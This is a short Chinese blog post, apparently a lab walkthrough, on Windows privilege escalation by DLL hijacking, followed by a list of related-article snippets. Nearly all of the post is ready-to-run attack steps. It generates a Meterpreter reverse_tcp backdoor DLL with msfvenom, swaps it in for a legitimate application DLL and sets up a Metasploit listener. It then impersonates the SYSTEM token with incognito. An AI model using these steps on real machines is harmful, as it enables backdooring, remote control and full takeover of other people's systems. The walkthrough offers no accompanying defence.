提权_DLL劫持提权

最新推荐文章于 2024-06-28 08:01:16 发布
最新推荐文章于 2024-06-28 08:01:16 发布
阅读量1.7k 收藏 4
点赞数 1
分类专栏: 提权测试 文章标签: windows 安全 visual studio
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44798520/article/details/121495276
版权

1.通过火绒剑分析进程

分析进程调用模块,找到可以利用的dll文件,本次试验劫持idmmkb.dll文件

在这里插入图片描述

2.MSF生成后门dll木马

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.61.131 lport=8888 -f dll >C:\Users\Ninja\Desktop\idmmkb.dll

在这里插入图片描述

3.上传替换

在这里插入图片描述

4.MSF监听

>use exploit/multi/handler
>set payload windows/meterpreter/reverse_tcp
>set lhost 192.168.61.131
>set lport 8888
>exploit

等待程序运行,木马执行。

在这里插入图片描述

5.配合令牌窃取进行提权

>use incognito  (进入incognito模块)
>list_tokens -u  (列出令牌)
>impersonate_token "NT AUTHORITY\\SYSTEM"

在这里插入图片描述

草木caomu
关注
  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
记一次绕过火绒安全提权实战案例1
08-03
记一次绕过火绒安全提权实战案例1
记一次绕过火绒安全提权实战案例
渗透测试研究中心
01-24 1859
0x01 前言朋友发来一个站让帮看下提权,服务器上安装的有护卫神+火绒+安全狗等安全防护软件,看着确实挺唬人,他也试了不少常用提权EXP,结果都失败了,可能是欠缺免杀EXP能力吧,当然也有可能是修复了这些漏洞,抽空给他看了下并写了这篇记录文章。在拿到权限后用中国菜刀连了下,不过好像被拦截了,提示:服务器返回无效或不可识别的响应,以前也多次遇到这种情况,这里只要换成Godzilla就能正常连接了。...
DLL劫持技术权限提升及防范
最新发布
Ms08067安全实验室
06-28 858
点击星标,即时接收最新推文本文选自《内网安全攻防:红队之路》扫描二维码五折购书DLL劫持技术权限提升及防范 Dll劫持原理介绍 DLL(Dynamic Link Library)文件为动态链接库文件,又称“应用程序拓展”,是一种文件类型。在程序运行中,可能会需要一些相对独立的动态链接库,而这些预先放置在系统中的动态链接库文件。当我们执行某一个程序时,相应的DLL文件就会被调用。DLL 是一...
windows本地提权--dll劫持&不带引号的服务&不安全的服务
金灰的博客
04-25 760
本地--->system。
本地微信DLL劫持提权复现
weixin_46686336的博客
11-11 1617
DLL劫持提权Windows提权
基于DLL劫持的WebShell提权
沧海桑田
05-05 1293
从本文您可以学到:   什么是DLL劫持   DLL劫持在破解逆向程序时是常用的,我们同样可以用于Webshell提权。   ●DLL劫持产生的原因●   先来看一下,DLL劫持的原因。   1、WindowsDLL称为动态链接库,动态链接库技术的本质实际上是将可执行文件与库文件分离,DLL库文件通过导出表提供API接口,PE加载器通过exe文件的导入表加载相应的D
PR无参版提权_K8
07-04
标题中的“PR无参版提权_K8”指的是在Windows操作系统环境下,利用PR(可能是指Privilege Raise,即权限提升)工具的一种无参数版本进行权限提升的技术。在网络安全和系统管理领域,提权通常指的是攻击者通过利用...
PoCs-win提权.zip
04-08
3. **DLL劫持**:通过替换系统正常加载的动态链接库(DLL),使得程序在运行时以攻击者的恶意代码代替,从而达到提权的目的。 4. **权限管理不当**:利用系统权限管理的疏漏,如SMB服务、WMI(Windows Management ...
Windows渗透与提权技巧
05-05
- **DLL劫持**:通过替换系统或应用程序的动态链接库(DLL),在特定条件下执行恶意代码。 3. **防御策略**: - **安全更新**:定期安装Windows的补丁和安全更新,修复已知漏洞。 - **强密码策略**:设置复杂且...
多元化提权拿服务器.zip
12-29
在IT安全领域,尤其是Web应用安全中,"提权"是一个关键的概念,它指的是攻击者在获取了系统或网络中的初步访问权限后,尝试提升其权限级别,以便于执行更高级别的操作,如控制服务器、读取敏感数据等。本教程以"多元...
360本地提权漏洞演示程序
09-13
这些技术可能包括Shellcode、DLL劫持、权限令牌篡改等。 4. **安全防御**:为了防止提权,系统通常会实施各种安全机制,如数据执行保护(DEP)、地址空间布局随机化(ASLR)、沙箱等。了解这些防御机制有助于我们...
Windows提权】本地提权dll劫持
ssrf
03-04 2363
目录0x001 原理0x002 演示1、收集进程加载的dll2、msf制作dll木马3、替换dll4、启动软件 0x001 原理 Windows程序启动的时候需要DLL。如果这些DLL 不存在,则可以通过在应用程序要查找的位置放置恶意DLL提权。通常,Windows应用程序有其预定义好的搜索DLL的路径,它会根据下面的顺序进行搜索: Windows查找DLL目录及其顺序如下: 1、应用程序加载的目录 2、C:\Windows\System32 3、C:\Windows\System 4、C:\Wind
【转】Windows提权---DLL注入/不带引号的服务路径
tpriwwq的专栏
04-01 101
DLL注入/不带引号的服务路径
Windows提权---DLL注入/不带引号的服务路径/注册表
qq_40012781的博客
07-03 1055
DLL注入提权、不带引号的服务路径提权、注册表提权
提权 - Windows 烂土豆/ dll劫持 /服务权限
acepanhuan的博客
03-01 1237
提权 - Windows 烂土豆/ dll劫持 /服务权限
高版本mysql自定义dll提权_MySQL提权之udf提权(获得webshell的情况)
weixin_34194520的博客
01-19 477
什么是udf提权?MySQL提供了一个让使用者自行添加新的函数的功能,这种用户自行扩展函数的功能就叫udf。它的提权原理也非常简单!即是利用了root 高权限,创建带有调用cmd的函数的udf.dll动态链接库!这样一来我们就可以利用 system权限进行提权操作了!当我们拿到webshell后,由于中间件,例如,apache使用了较低的权限,可能仅仅是个网络服务的权限,然后我们就需要进行提权,而...
mysql上传dll 提权_SqlMap mysql udf.dll 提权
weixin_32272937的博客
01-19 177
上传dll文件到任意目录,如:D:/RECYCLER/lib_mysqludf_sys.dll导入dll,根据版本导入到windows或mysql 插件目录(一般执行select @@plugin_dir 可看到插件目录具体路径):select load_file(‘D:/RECYCLER/lib_mysqludf_sys.dll’) into dumpfile’c:/windows/lib_my...
Windows本地提权 · 下篇
qq_61553520的博客
05-31 1352
Windows本地提权,这种提权适用于有一本地个用户的基础上,有一定的权限,无法从webshell上进行提权
提权-win烂土豆&dll劫持&引号路径&服务权限
qi_SJQ_的博客
02-02 1703
以下几种提权方法的适合环境(web用户/本机用户)因方法而不同,有的方法在两种权限下都适用,一般也都是本机权限大于webshell权限。 win 烂土豆提权(MS16-075): 烂土豆(Rotten Potato)提权是一个本地提权,是针对本地用户的,不能用于域用户,webshell环境或本地普通用户环境都可以适用。 过程:msf生成上传烂土豆-执行烂土豆-利用msf窃取模块-窃取 SYSTEM-成功(漏洞编号:CVE-2016-3225 )。 我们是用之前的令牌窃取提权无法成功,因为web.
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值